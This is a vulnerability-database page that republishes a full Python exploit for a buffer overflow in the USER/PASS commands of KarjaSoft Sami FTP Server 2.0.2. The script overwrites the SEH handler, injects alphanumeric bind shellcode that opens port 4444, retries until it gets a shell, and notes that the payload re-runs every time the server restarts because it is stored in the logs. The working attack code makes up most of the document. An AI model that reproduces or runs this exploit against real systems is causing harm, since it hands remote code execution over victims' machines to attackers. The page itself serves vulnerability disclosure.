Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH) Exploit

🗓️ 01 Nov 2016 00:00:00Reported by n30m1ndType 
zdt
 zdt🔗 0day.today👁 46 Views

KarjaSoft Sami FTP Server 2.0.2 - Remote Buffer Overflow Exploi

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2006-0441
30 Apr 201000:00
circl
CVE		CVE-2006-0441
26 Jan 200622:00
cve
Cvelist		CVE-2006-0441
26 Jan 200622:00
cvelist
Metasploit		KarjaSoft Sami FTP Server v2.0.2 USER Overflow
17 Mar 200814:23
metasploit
NVD		CVE-2006-0441
26 Jan 200622:03
nvd
Packet Storm		KarjaSoft Sami FTP Server 2.0.2 Buffer Overflow
1 Nov 201600:00
packetstorm
Packet Storm		KarjaSoft Sami FTP Server v2.02 USER Overflow
26 Nov 200900:00
packetstorm
Prion		Stack overflow
26 Jan 200622:03
prion
Prion		Buffer overflow
17 Nov 200818:18
prion
canvas		Immunity Canvas: SAMIFTP
26 Jan 200622:03
canvas
Rows per page
#/usr/bin/python
#-*- Coding: utf-8 -*-
 
### Sami FTP Server 2.0.2- SEH Overwrite, Buffer Overflow by n30m1nd ### 
 
# Date: 2016-01-11
# Exploit Author: n30m1nd
# Vendor Homepage: http://www.karjasoft.com/
# Software Link: http://www.karjasoft.com/files/samiftp/samiftpd_install.exe
# Version: 2.0.2
# Tested on: Win7 64bit and Win10 64 bit
 
# Credits
# =======
# Thanks to PHRACK for maintaining all the articles up for so much time... 
# These are priceless and still current for exploit development!!
# Shouts to the crew at Offensive Security for their huge efforts on making the infosec community better
 
# How to
# ======
# * Open Sami FTP Server and open its graphical interface
# * Run this python script and write the IP to attack
# * Connect to the same IP on port 4444
#
# BONUS
# =====
# Since the program will write the data into its (SamiFTP.binlog) logs it will try to load these logs on each
# start and so, it will crash and run our shellcode everytime it starts.
 
# Why?
# ====
# The graphical interface tries to show the user name which produces an overflow overwriting SEH
 
# Exploit code
# ============
 
import socket
import struct
 
def doHavoc(ipaddr):
    # Bad chars: 00 0d 0a ff
    alignment = "\x90"*3
     
    jmpfront = "345A7504".decode('hex')
    #CPU Disasm
    #Hex dump          Command 
    #  34 5A           XOR AL,5A
    #  75 04           JNE SHORT +04
     
    # pop pop ret in tmp01.dll
    popret = 0x10022ADE
     
    # fstenv trick to get eip: phrack number 62
    # and store it into EAX for the metasploit shell (BufferRegister)
    getEIPinEAX = "D9EED934E48B44E40C040b".decode('hex')
    #CPU Disasm
    #Hex dump          Command
    #  D9EE            FLDZ
    #  D934E4          FSTENV SS:[ESP]
    #  8B44E4 0C       MOV EAX,DWORD PTR SS:[ESP+0C]
    #  04 0B           ADD AL,0B
 
    # Bind shellcode on port 4444 - alpha mixed BufferRegister=EAX
    shellcode = (
        getEIPinEAX +
        "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylm8mRS0UP7p"
        "e0K9jEDqYPU4Nk60VPlKCbdLnkbrWdLKqb4hfoNWczEvdqyoNLElpaalC2dl10kq"
        "xO6mEQ9WxbjRf22wNkf220lKsz5lNkblr1sHxcsxGqZqcaLK0YQ05QiCNkCyB8Hc"
        "VZ1Ynk5dlKEQyF01IoNLYQHOvm31yW6X9pRUXvwsSMIhgKqmDdT5KTf8NkaHWTEQ"
        "yCavNkDLBklKbx7lgqN3nkC4nkuQXPk9w47Tq4skaKsQV9pZPQkOYpcosobzNkWb"
        "8kNmSmbH5cP2C0Wpu8Qgd3UbCof4e80LD7ev379oyElxlP31GpWpFIo4V4bpCXa9"
        "op2KePyohURJFhPY0P8bimw0pPG0rpu8xjDOYOipYoiEj7QxWrC0wa3lmYZFbJDP"
        "qFqGCXYRIKDw3WkOZuv7CXNWkYehKOkOiEaGPhD4HlwKm1KOhUQGJ7BHRUpnrmqq"
        "Iokee83S2McT30oyXcQGV767FQIfcZfrv9PVYrImQvKwG4DdelvaGqLM0D5tDPO6"
        "GpRd0T602vaFF6w666rnqFsf2sPV0h2YzleoovYoXUK9kPrnSfPFYo00Ph7xk7wm"
        "sPYoKeMkxplulb2vsXoVmEOMomKO9EgL4FCLFjk0YkM0qec5Mkg7FsD2ROqzGpv3"
        "ioJuAA"
    )
     
    # Final payload, SEH overwrite ocurrs at 600 bytes
    payload = alignment + "."*(600-len(alignment)-len(jmpfront)) + jmpfront + struct.pack("<L", popret) + shellcode
    try:
        s = socket.create_connection((ipaddr, 21))
        s.send("USER "+ payload +"\r\n" )
        print s.recv(4096)
         
        s.send("PASS "+ payload +"\r\n" )
        print s.recv(4096)
        print s.recv(4096)
    except e:
        print str(e)
        exit("[+] Couldn't connect")
             
if __name__ == "__main__":
    ipaddr = raw_input("[+] IP: ")
    doHavoc(ipaddr)
    while raw_input("[?] Got shell?(y/n) ").lower() == "n":
        doHavoc(ipaddr)
    print "[+] Enjoy..."

#  0day.today [2018-01-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Nov 2016 00:00Current
6.6Medium risk
Vulners AI Score6.6
EPSS0.78031
buffer overflowpython scriptexploit developmentkarjasoft sami ftp serverwin7win10seh overwritephrackoffensive securitysamiftp.binlogshellcodeport 4444eipmetasploit shellbind shellcodecpu disasmbad charsvulnerabilitynetwork security .
46